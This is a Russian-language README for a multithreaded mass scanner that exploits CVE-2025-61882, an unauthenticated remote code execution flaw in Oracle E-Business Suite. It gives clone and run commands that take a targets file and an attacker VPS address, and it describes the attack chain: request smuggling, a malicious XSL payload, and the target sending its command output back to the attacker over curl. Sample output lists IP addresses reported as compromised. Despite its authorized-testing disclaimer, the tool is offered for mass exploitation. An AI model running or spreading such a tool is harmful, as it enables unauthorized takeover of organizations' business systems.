## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SACHINART-CVE-2025-61882
# Сканер RCE для Oracle E-Business Suite (CVE-2025-61882)
Быстрый многопоточный массовый сканер для обнаружения CVE-2025-61882 в установках Oracle E-Business Suite. Эта критическая уязвимость позволяет неаутентифицированное удалённое выполнение кода.
  
## 🎯 Возможности
* **Массовое сканирование** — обработка сотен или тысяч целей из файла
* **Многопоточность** — настраиваемое параллельное сканирование (по умолчанию: 20 потоков)
* **Автоматическое обнаружение** — проверка RCE путём выполнения команды `id` и анализа вывода
* **Результаты в реальном времени** — уязвимые цели немедленно записываются в `vuln-output.txt`
* **Случайные порты** — используются случайные порты (2000-9999) для каждой цели во избежание конфликтов
* **Чистый вывод** — отслеживание прогресса с минимальным шумом
## 📋 Требования
root@kitploit:~
pip install requests
И всё. Нужны только Python 3.7+ и библиотека `requests`.
## 🚀 Установка
root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
## 💻 Использование
### Базовое сканирование
root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
### Быстрое сканирование (50 потоков)
root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
### Консервативное сканирование (10 потоков)
root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
## 📝 Формат файла целей
Создайте файл `targets.txt` с одним URL в строке:
root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
## 📊 Пример вывода
root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt
[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882
[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================
[+] Vulnerable targets found:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
## 📄 Выходной файл
Результаты сохраняются в `vuln-output.txt`:
root@kitploit:~
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
## 🔍 Как это работает
1. **Получение CSRF-токена** — извлекает действующий CSRF-токен с цели
2. **HTTP Request Smuggling** — эксплуатирует уязвимость контрабанды запросов для внедрения вредоносной полезной нагрузки
3. **Доставка XSL-полезной нагрузки** — обслуживает вредоносную XSL-таблицу стилей, которая выполняет команды
4. **Проверка обратного вызова** — цель выполняет команду `id` и отправляет вывод обратно через curl
5. **Сопоставление по регулярному выражению** — подтверждает успешный RCE путём проверки шаблона `uid=...gid=...`
## ⚙️ Конфигурация
## 🔒 Ответственное раскрытие
Этот инструмент предназначен **только для авторизованного тестирования безопасности**. Всегда:
* ✅ Получайте письменное разрешение перед тестированием
* ✅ Сканируйте только те системы, которыми владеете или на тестирование которых имеете явное разрешение
* ✅ Ответственно сообщайте о находках затронутым организациям
* ✅ Следуйте практике скоординированного раскрытия уязвимостей
* ❌ Никогда не используйте это на неавторизованных системах
**Несанкционированный доступ к компьютерным системам является незаконным.**
## 🐛 Известные проблемы
* Некоторые цели могут не отвечать из-за блокировки межсетевым экраном/IDS
* Обнаружение обратного вызова требует, чтобы цель могла связаться с вашим VPS на случайных портах
* Предупреждения о сертификатах SSL подавляются (ожидаемо для пентестинга)
## 🤝 Вклад в проект
Нашли ошибку? Есть запрос функции?
1. Сделайте форк репозитория
2. Создайте свою ветку функции (`git checkout -b feature/amazing-feature`)
3. Зафиксируйте изменения (`git commit -m 'Add some feature'`)
4. Отправьте в ветку (`git push origin feature/amazing-feature`)
5. Откройте Pull Request
## 📜 Лицензия
Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.
## ⚠️ Отказ от ответственности
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте на свой страх и риск.
## 📚 Ссылки
* Детали CVE-2025-61882
* Критическое обновление Oracle
* * *
### 👨💻 Разработано Chirag Artani
**Веб-сайт** • **Twitter** • **LinkedIn**
Сделано с ❤️ для сообщества infosec